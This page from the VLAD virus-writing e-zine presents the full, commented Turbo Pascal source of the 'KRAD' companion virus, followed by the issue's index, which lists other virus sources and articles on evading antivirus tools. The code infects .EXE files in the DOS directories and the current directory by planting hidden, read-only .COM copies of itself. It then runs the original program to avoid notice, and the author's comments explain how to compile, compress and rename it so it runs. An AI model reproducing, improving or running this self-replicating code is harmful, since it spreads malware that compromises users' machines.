Virus Labs & Distribution
VLAD #1 - KRAD Source


                                                                              
Program KRAD;                                                                 
                                                                              
{       Virus Laboratories and Distribution
          Proudly present the KRAD Virus                                      
     Written by Metabolis for non assembler ppls                              
                                                                              
          Why call it the KRAD virus?  Cos it is!  A companion virus          
          written in Turbo Pascal, well that just sums it up.  I wrote        
          this for two reasons.. 1) Not everyone knows assembler 2)           
          a friend reckoned a virus couldn't be programmed in Turbo           
          Pascal.. (by that he meant *I* couldn't do it).  No matter          
          how lame.. it's still a virus!  (Right up there with Aids/          
          Number 1 :))  Fully commented for non understanding Pascal          
          people, (a very small part of the world).                           
                                                                              
          Compress this with DIET/PkLite/LZEXE or something similar           
          when it's compiled.  Then rename it to a .COM file and hey          
          presto, you can run it!  I guess an added bonus of this             
          virus is, if there's another companion virus on your system         
          it won't overwrite it, it will take that as an infection            
          and leave it alone.                                                 
                                                                              
          KRAD virus will immediately infect C:\DOS or C:\MSDOS if            
          they exist, so if any DOS .EXE files are run it will infect         
          all the files in the current dir that you ran the DOS               
          command from. }                                                     
                                                                              
Uses Dos,Crt;  {Even if I don't use one of 'em..                              
               it's best to include both. }                                   
                                                                              
{$M 59999,0,8000}  {This program needs memory for two things..                
                    1) To use as a buffer when copying the virus              
                    2) To execute the program originally run. }               
                                                                              
Var Inf,Inf2:Searchrec;  {Used in the EXE and file_exist routines }           
    Infected:Boolean;    {Is a file infected? }                               
    Params:Byte;         {Loop Index for adding all parameters together }     
    All_Params:String;   {This string contains the whole list of parameters   
                          originally passed to the program }                  
    P:PathStr;           { Used by the FSplit procedure. }                    
    D:DirStr;            { "" }                                               
    N:NameStr;           { "" }                                               
    E:ExtStr;            { "" }                                               
                                                                              
Procedure Check_Infected(Path:String);                                        
{Is the .EXE file we've found infected? }                                     
Begin                                                                         
  FSplit(Inf.Name,D,N,E);             {Split it up into directory, name       
                                       and extension. }                       
  FindFirst(Path+N+'.COM',Anyfile,Inf2);   {Look for the .COM file with the   
                                       same file name, if this exists         
                                       then the file is already infected. }   
  Infected:=(DosError=0);             {Set the Infected flag }                
End;                                                                          
                                                                              
Procedure CopyFile(SourceFile, TargetFile:string);                            
{Straight Forward copying routine, I won't comment all of this.. }            
var                                                                           
  Source,                                                                     
  Target : file;                                                              
  BRead,                                                                      
  Bwrite : word;                                                              
  FileBuf  : array[1..2048] of char;                                          
Begin                                                                         
    Assign(Source,SourceFile);                                                
    SetFattr(Source,$20);              {Set the file attributes of the        
                                        hidden COM companion we're going      
                                        to be copying to archive so that      
                                        it's possible read it. }              
    {$I-}                                                                     
    Reset(Source,1);                                                          
    {$I+}                                                                     
    If IOResult <> 0 then                                                     
    Begin                                                                     
        Exit;                          {Couldn't open the source file! }      
    End;                                                                      
    Assign(Target,TargetFile);                                                
    {$I-}                                                                     
    Rewrite(Target,1);                                                        
    {$I+}                                                                     
    If IOResult <> 0 then                                                     
    Begin                                                                     
        Exit;                          {Couldn't open the target file! }      
    End;                                                                      
    Repeat                                                                    
         BlockRead(Source,FileBuf,SizeOf(FileBuf),BRead);                     
         BlockWrite(Target,FileBuf,Bread,Bwrite);                             
    Until (Bread = 0) or (Bread <> BWrite);                                   
    Close(Source);                                                            
    Close(Target);                                                            
    SetFattr(Source,3);                {Set the COM companion that we         
                                        copied back to hidden and             
                                        read-only. }                          
    SetFattr(Target,3);                                                       
End;                                                                          
                                                                              
Procedure FaI(Path:String);                                                   
{Find and Infect!}                                                            
Begin                                                                         
  FindFirst(Path+'*.EXE',AnyFile,Inf);  {Check for .EXEs to infect! }         
  While DosError=0 Do Begin                                                   
    Infected:=False;                                                          
    Check_Infected(Path);  { Check if the .EXE found is already infected. }   
    If Not Infected then Begin                                                
      CopyFile(ParamStr(0),Path+N+'.COM');                                    
    End;                                                                      
    { If the file isn't infected then copy the .COM version of the            
      file you're executing to companionship with the .EXE you have           
      found that isn't infected. }                                            
    FindNext(Inf);                                                            
  End;                                                                        
End;                                                                          
                                                                              
Begin                                                                         
  FaI('C:\DOS\');            { Find & Infect!  Go for the DOS dirs first }    
  FaI('C:\MSDOS\');          { because this is where most EXE files will }    
  FaI('');                   { be executed from! }                            
  FSplit(ParamStr(0),D,N,E); { Make sure we have the path and name of the     
                               file we actually want to execute. }            
  All_Params:='';   { "Remember to initialise those variables!" - Teacher }   
  For Params:=1 To ParamCount                                                 
       do All_Params:=All_Params+ParamStr(Params)+' ';                        
  Exec(D+N+'.EXE',All_Params);        {Execute the file that the user         
                                       wanted to in the first place           
                                       keeping all original parameters. }     
End.                                                                          
{Easy wasn't it?  I thought so.. }                                            

- VLAD #1 INDEX -

ARTICLE.1_1      

Introduction
ARTICLE.1_2       Aims and Policies
ARTICLE.1_3       Greets
ARTICLE.1_4       Membership
ARTICLE.1_5       Distribution
ARTICLE.1_6       A Secret Thing

ARTICLE.2_1      

Ripping Source
ARTICLE.2_2       Good & Bad Code
ARTICLE.2_3       The Evil AV
ARTICLE.2_4       A Look At TBAV
ARTICLE.2_5       Polymorphism
ARTICLE.2_6       Anti-TBClean
ARTICLE.2_7       Paranoia

ARTICLE.3_1      

Incest Family
ARTICLE.3_2       Daddy Source
ARTICLE.3_3       Mummy Source
ARTICLE.3_4       Sister Source
ARTICLE.3_5       Brother Source
ARTICLE.3_6       KRAD Source
ARTICLE.3_7       What's Next

About VLAD - Links - Contact Us - Main